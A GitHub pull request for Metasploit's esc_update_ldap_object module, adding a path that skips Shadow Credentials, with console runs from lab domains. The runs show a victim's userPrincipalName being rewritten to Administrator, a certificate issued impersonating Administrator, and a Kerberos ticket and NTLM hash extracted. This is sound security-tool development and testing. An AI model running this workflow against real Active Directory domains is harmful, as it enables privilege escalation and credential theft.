Skip to content

Update esc_update_ldap module so shadow creds not required #20566

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 2 commits into from
Oct 1, 2025
Merged

Update esc_update_ldap module so shadow creds not required #20566

merged 2 commits into from
Oct 1, 2025

Conversation

@jheysel-r7
Copy link
Contributor

Updates auxiliary/admin/dcerpc/esc_update_ldap_object to work when using Shadow Credentials is not necessary. This accounts for scenarios where:

  1. The operator is attempting to update their own LDAP object (LDAPUsername == TARGET_USERNAME) in order to exploit one of the ESC misconfigurations.
  2. The operator already has the password for the TARGET_USERNAME (a TARGET_PASSWORD datastore option has been added)

Verification

Test the following three scenarios. When verifying, look to ensure the Certificate UPN in the output is getting set to the value defined in the UPDATE_LDAP_OBJECT_VALUE.
ex: Certificate UPN: Administrator. Also ensure the module is cleaning up properly, UPDATE_LDAP_OBJECT is getting reset properly and the Shadow Credential is being removed if it gets created.

Set TARGET_PASSWORD (the password for the TARGET_USERNAME ) see that the Shadow Credentials code path does not get run and the module still runs successfully

msf auxiliary(admin/dcerpc/esc_update_ldap_object) > options

Module options (auxiliary/admin/dcerpc/esc_update_ldap_object):

   Name                      Current Setting    Required  Description
   ----                      ---------------    --------  -----------
   ADD_CERT_APP_POLICY                          no        Add certificate application policy OIDs
   ALT_DNS                                      no        Alternative certificate DNS
   ALT_SID                                      no        Alternative object SID
   ALT_UPN                                      no        Alternative certificate UPN (format: USER@DOMAIN)
   CA                        kerberos-DC2-CA    yes       The target certificate authority
   CERT_TEMPLATE             User               yes       The certificate template
   LDAPDomain                kerberos.issue     yes       The domain to authenticate to
   LDAPPassword              N0tpassword!       yes       The password to authenticate with
   LDAPUsername              user1              yes       The username to authenticate with, who must have permissions to update the TARGET_USERNAME
   SSL                       false              no        Enable SSL on the LDAP connection
   TARGET_PASSWORD           N0tpassword!       no        The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticaet as the TARGET_USERNAME
   TARGET_USERNAME           user2              yes       The username of the target LDAP object (the victim account).
   UPDATE_LDAP_OBJECT        userPrincipalName  yes       Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. (Accepted: userPrincipalName, dNSHostName)
   UPDATE_LDAP_OBJECT_VALUE  Administrator      yes       The account name you wish to impersonate


   Used when making a new connection via RHOSTS:

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   445              no        The target port (TCP)


Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate



View the full module info with the info, or info -d command.

msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run
[*] Running module against 172.16.199.200
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Current value of user2's userPrincipalName:
[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
[+] The operation completed successfully!
[+] 172.16.199.200:445 - The requested certificate was issued.
[*] 172.16.199.200:445 - Certificate Policies:
[*] 172.16.199.200:445 - Certificate UPN: Administrator
[*] 172.16.199.200:445 - Certificate stored at: /home/msfuser/.msf4/loot/20250923135918_default_172.16.199.200_windows.ad.cs_341723.pfx
[*] 172.16.199.200:445 - Reverting ldap object
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Attempting to delete attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue...
[+] Successfully deleted attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue
[+] The operation completed successfully!
[*] Auxiliary module execution completed
msf auxiliary(admin/dcerpc/esc_update_ldap_object) >

Unset TARGET_PASSWORD and set TARGET_USERNAME to the same user as LDAPUsername and see that the Shadow Credentials code path does not get run and the module still runs successfully

msf auxiliary(admin/dcerpc/esc_update_ldap_object) > unset TARGET_PASSWORD
Unsetting TARGET_PASSWORD...
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > set TARGET_USERNAME user1
TARGET_USERNAME => user1
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > options

Module options (auxiliary/admin/dcerpc/esc_update_ldap_object):

   Name                      Current Setting    Required  Description
   ----                      ---------------    --------  -----------
   ADD_CERT_APP_POLICY                          no        Add certificate application policy OIDs
   ALT_DNS                                      no        Alternative certificate DNS
   ALT_SID                                      no        Alternative object SID
   ALT_UPN                                      no        Alternative certificate UPN (format: USER@DOMAIN)
   CA                        kerberos-DC2-CA    yes       The target certificate authority
   CERT_TEMPLATE             User               yes       The certificate template
   LDAPDomain                kerberos.issue     yes       The domain to authenticate to
   LDAPPassword              N0tpassword!       yes       The password to authenticate with
   LDAPUsername              user1              yes       The username to authenticate with, who must have permissions to update the TARGET_USERNAME
   SSL                       false              no        Enable SSL on the LDAP connection
   TARGET_PASSWORD                              no        The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticaet as the TARGET_USERNAME
   TARGET_USERNAME           user1              yes       The username of the target LDAP object (the victim account).
   UPDATE_LDAP_OBJECT        userPrincipalName  yes       Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. (Accepted: userPrincipalName, dNSHostName)
   UPDATE_LDAP_OBJECT_VALUE  Administrator      yes       The account name you wish to impersonate


   Used when making a new connection via RHOSTS:

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   445              no        The target port (TCP)


Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate



View the full module info with the info, or info -d command.

msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run
[*] Running module against 172.16.199.200
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Current value of user1's userPrincipalName: [email protected]
[*] Attempting to update userPrincipalName for CN=user1,CN=Users,DC=kerberos,DC=issue to Administrator...
[+] Successfully updated CN=user1,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
[+] The operation completed successfully!
[+] 172.16.199.200:445 - The requested certificate was issued.
[*] 172.16.199.200:445 - Certificate Policies:
[*] 172.16.199.200:445 - Certificate UPN: Administrator
[*] 172.16.199.200:445 - Certificate stored at: /home/msfuser/.msf4/loot/20250923140137_default_172.16.199.200_windows.ad.cs_629741.pfx
[*] 172.16.199.200:445 - Reverting ldap object
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Current value of user1's userPrincipalName: Administrator
[*] Attempting to update userPrincipalName for CN=user1,CN=Users,DC=kerberos,DC=issue to [email protected]...
[+] Successfully updated CN=user1,CN=Users,DC=kerberos,DC=issue's userPrincipalName to [email protected]
[+] The operation completed successfully!
[*] Auxiliary module execution completed
msf auxiliary(admin/dcerpc/esc_update_ldap_object) >

Confirm the original exploit path still works. Where LDAPUsername != TARGET_USERNAME, TARGET_PASSWORD is unset and the Shadow Credentials method is used and is cleaned up afterwards

msf auxiliary(admin/dcerpc/esc_update_ldap_object) > set target_username user2
target_username => user2
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > options

Module options (auxiliary/admin/dcerpc/esc_update_ldap_object):

   Name                      Current Setting    Required  Description
   ----                      ---------------    --------  -----------
   ADD_CERT_APP_POLICY                          no        Add certificate application policy OIDs
   ALT_DNS                                      no        Alternative certificate DNS
   ALT_SID                                      no        Alternative object SID
   ALT_UPN                                      no        Alternative certificate UPN (format: USER@DOMAIN)
   CA                        kerberos-DC2-CA    yes       The target certificate authority
   CERT_TEMPLATE             User               yes       The certificate template
   LDAPDomain                kerberos.issue     yes       The domain to authenticate to
   LDAPPassword              N0tpassword!       yes       The password to authenticate with
   LDAPUsername              user1              yes       The username to authenticate with, who must have permissions to update the TARGET_USERNAME
   SSL                       false              no        Enable SSL on the LDAP connection
   TARGET_PASSWORD                              no        The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticaet as the TARGET_USERNAME
   TARGET_USERNAME           user2              yes       The username of the target LDAP object (the victim account).
   UPDATE_LDAP_OBJECT        userPrincipalName  yes       Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. (Accepted: userPrincipalName, dNSHostName)
   UPDATE_LDAP_OBJECT_VALUE  Administrator      yes       The account name you wish to impersonate


   Used when making a new connection via RHOSTS:

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   445              no        The target port (TCP)


Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate



View the full module info with the info, or info -d command.

msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run
[*] Running module against 172.16.199.200
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Current value of user2's userPrincipalName:
[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
[+] The operation completed successfully!
[*] 172.16.199.200:445 - Adding shadow credentials for user2
[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Discovering base DN automatically
[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
[*] Certificate stored at: /home/msfuser/.msf4/loot/20250923140515_default_172.16.199.200_windows.ad.cs_922206.pfx
[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID b9ed6cbe-22f8-28f9-85af-b059e73aa7e8
[*] 172.16.199.200:445 - Loading admin/kerberos/get_ticket
[*] 172.16.199.200:445 - Getting hash for user2
[!] Warning: Provided principal and realm ([email protected]) do not match entries in certificate:
[+] 172.16.199.200:88 - Received a valid TGT-Response
[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20250923140515_default_172.16.199.200_mit.kerberos.cca_107720.bin
[*] 172.16.199.200:88 - Getting NTLM hash for [email protected]
[+] 172.16.199.200:88 - Received a valid TGS-Response
[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20250923140515_default_172.16.199.200_mit.kerberos.cca_991115.bin
[+] Found NTLM hash for user2: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
[+] 172.16.199.200:445 - The requested certificate was issued.
[*] 172.16.199.200:445 - Certificate Policies:
[*] 172.16.199.200:445 - Certificate UPN: Administrator
[*] 172.16.199.200:445 - Certificate stored at: /home/msfuser/.msf4/loot/20250923140518_default_172.16.199.200_windows.ad.cs_992950.pfx
[*] 172.16.199.200:445 - Removing shadow credential
[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Discovering base DN automatically
[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
[+] Deleted entry with device ID b9ed6cbe-22f8-28f9-85af-b059e73aa7e8
[*] 172.16.199.200:445 - Reverting ldap object
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Attempting to delete attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue...
[+] Successfully deleted attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue
[+] The operation completed successfully!
[*] Auxiliary module execution completed

@jheysel-r7 jheysel-r7 added enhancement rn-enhancement release notes enhancement labels Sep 23, 2025
adfoster-r7
adfoster-r7 reviewed Sep 25, 2025
View reviewed changes
@msutovsky-r7 msutovsky-r7 self-assigned this Sep 29, 2025
msutovsky-r7
msutovsky-r7 approved these changes Oct 1, 2025
View reviewed changes
Copy link
Contributor

@msutovsky-r7 msutovsky-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Works as expected

  • TARGET_PASSWORD is set
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run verbose=true 
[*] Running module against 10.5.132.180
[*] 10.5.132.180:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 10.5.132.180:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] Current value of msfuser's userPrincipalName: [email protected]
[*] Attempting to update userPrincipalName for CN=msfuser,CN=Users,DC=example,DC=com to Administrator...
[+] Successfully updated CN=msfuser,CN=Users,DC=example,DC=com's userPrincipalName to Administrator
[+] The operation completed successfully!
[*] 10.5.132.180:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 10.5.132.180:445 - Binding to \cert...
[+] 10.5.132.180:445 - Bound to \cert
[*] 10.5.132.180:445 - Requesting a certificate for user msfuser - digest algorithm: SHA256 - template: User
[+] 10.5.132.180:445 - The requested certificate was issued.
[*] 10.5.132.180:445 - Certificate Policies:
[*] 10.5.132.180:445 - Certificate UPN: Administrator
[!] 10.5.132.180:445 - No active DB -- Credential data will not be saved!
[*] 10.5.132.180:445 - Certificate stored at: /home/ms/.msf4/loot/20251001080340_default_10.5.132.180_windows.ad.cs_993110.pfx
[*] 10.5.132.180:445 - Reverting ldap object
[*] 10.5.132.180:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 10.5.132.180:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] Current value of msfuser's userPrincipalName: Administrator
[*] Attempting to update userPrincipalName for CN=msfuser,CN=Users,DC=example,DC=com to [email protected]...
[+] Successfully updated CN=msfuser,CN=Users,DC=example,DC=com's userPrincipalName to [email protected]
[+] The operation completed successfully!
[*] Auxiliary module execution completed
  • TARGET PASSWORD is not set, TARGET_USERNAME == LDAPUsername 
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run verbose=true 
[*] Running module against 10.5.132.180
[*] 10.5.132.180:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 10.5.132.180:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] Current value of Administrator's userPrincipalName: 
[*] Attempting to update userPrincipalName for CN=Administrator,CN=Users,DC=example,DC=com to Administrator...
[+] Successfully updated CN=Administrator,CN=Users,DC=example,DC=com's userPrincipalName to Administrator
[+] The operation completed successfully!
[*] 10.5.132.180:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 10.5.132.180:445 - Binding to \cert...
[+] 10.5.132.180:445 - Bound to \cert
[*] 10.5.132.180:445 - Requesting a certificate for user Administrator - digest algorithm: SHA256 - template: User
[+] 10.5.132.180:445 - The requested certificate was issued.
[*] 10.5.132.180:445 - Certificate Policies:
[*] 10.5.132.180:445 - Certificate UPN: Administrator
[!] 10.5.132.180:445 - No active DB -- Credential data will not be saved!
[*] 10.5.132.180:445 - Certificate stored at: /home/ms/.msf4/loot/20251001080506_default_10.5.132.180_windows.ad.cs_600856.pfx
[*] 10.5.132.180:445 - Reverting ldap object
[*] 10.5.132.180:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 10.5.132.180:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] Attempting to delete attribute userPrincipalName from CN=Administrator,CN=Users,DC=example,DC=com...
[+] Successfully deleted attribute userPrincipalName from CN=Administrator,CN=Users,DC=example,DC=com
[+] The operation completed successfully!
[*] Auxiliary module execution completed
  • TARGET PASSWORD is not set, TARGET_USERNAME != LDAPUsername 
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run verbose=true 
[*] Running module against 10.5.132.180
[*] 10.5.132.180:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 10.5.132.180:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] Current value of msfuser's userPrincipalName: [email protected]
[*] Attempting to update userPrincipalName for CN=msfuser,CN=Users,DC=example,DC=com to Administrator...
[+] Successfully updated CN=msfuser,CN=Users,DC=example,DC=com's userPrincipalName to Administrator
[+] The operation completed successfully!
[*] 10.5.132.180:445 - Adding shadow credentials for msfuser
[*] 10.5.132.180:445 - Loading admin/ldap/shadow_credentials
[*] 10.5.132.180:445 - Running admin/ldap/shadow_credentials
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 10.5.132.180:389 Discovered base DN: DC=example,DC=com
[*] Successfully queried (sAMAccountName=msfuser).
[!] No active DB -- Credential data will not be saved!
[*] Certificate stored at: /home/ms/.msf4/loot/20251001080543_default_10.5.132.180_windows.ad.cs_716414.pfx
[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 5d54d7de-3b29-6df6-5f04-866708dba976
[*] 10.5.132.180:445 - Loading admin/kerberos/get_ticket
[*] 10.5.132.180:445 - Getting hash for msfuser
[!] Warning: Provided principal and realm ([email protected]) do not match entries in certificate:
[-] Auxiliary aborted due to failure: unknown: Kerberos Error - KDC_ERR_CLIENT_NAME_MISMATCH (75) - PKINIT - KDC_ERR_CLIENT_NAME_MISMATCH
[*] 10.5.132.180:445 - Removing shadow credential
[*] 10.5.132.180:445 - Loading admin/ldap/shadow_credentials
[*] 10.5.132.180:445 - Running admin/ldap/shadow_credentials
[trimmed]

@msutovsky-r7 msutovsky-r7 merged commit 6e06963 into rapid7:master Oct 1, 2025
20 checks passed
@msutovsky-r7
Copy link
Contributor

Release Notes

This updates the esc_update_ldap module and takes into account the situations where shadow credentials are not required. Now the module will not use shadow credentials, unless it has to.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@adfoster-r7 adfoster-r7 adfoster-r7 left review comments

@msutovsky-r7 msutovsky-r7 msutovsky-r7 approved these changes

Assignees

@msutovsky-r7 msutovsky-r7

Labels

enhancement rn-enhancement release notes enhancement

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@jheysel-r7 @msutovsky-r7 @adfoster-r7